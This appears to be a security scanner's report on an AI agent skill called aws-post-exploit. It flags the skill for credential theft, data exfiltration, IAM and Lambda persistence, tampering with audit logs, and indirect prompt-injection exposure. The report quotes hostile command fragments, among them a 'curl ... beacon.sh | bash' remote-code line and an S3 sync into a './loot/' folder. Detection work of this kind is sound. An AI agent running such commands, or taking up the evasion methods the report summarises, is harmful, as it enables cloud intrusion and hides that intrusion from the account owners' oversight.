aws-post-exploit

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The prompt explicitly instructs retrieving AWS secrets (SecretsManager, SSM parameters, create-access-key, Lambda env vars, etc.) and shows exfiltration patterns that would require the agent to capture and emit secret values verbatim, creating a direct exfiltration risk.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is a clear, comprehensive playbook for malicious AWS post-exploitation—documenting explicit data exfiltration techniques, credential theft, backdoor/persistence methods (IAM backdoors, Lambda layers/extensions/alias-weighting, EventBridge/SSM/EC2 persistence), and audit/monitoring evasion (CloudTrail/GuardDuty/FlowLogs/Config tampering)—and thus constitutes intentionally malicious behavior and backdoor instructions.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The skill's required workflows (SKILL.md and references/data-exfiltration.md) instruct the operator to fetch and inspect untrusted user-generated content (e.g., aws s3 sync s3:// ./loot/, aws lambda get-function --query 'Code.Location' ... | xargs curl -o function.zip, and downloading Layer/Code.Location URLs), meaning the agent would download and interpret arbitrary third‑party S3/Lambda/code artifacts that could embed instructions influencing subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and execute remote code (e.g., "curl https:///beacon.sh | bash" and similar SSM/UserData examples), so the external URL https:///beacon.sh is a runtime dependency that would execute remote code.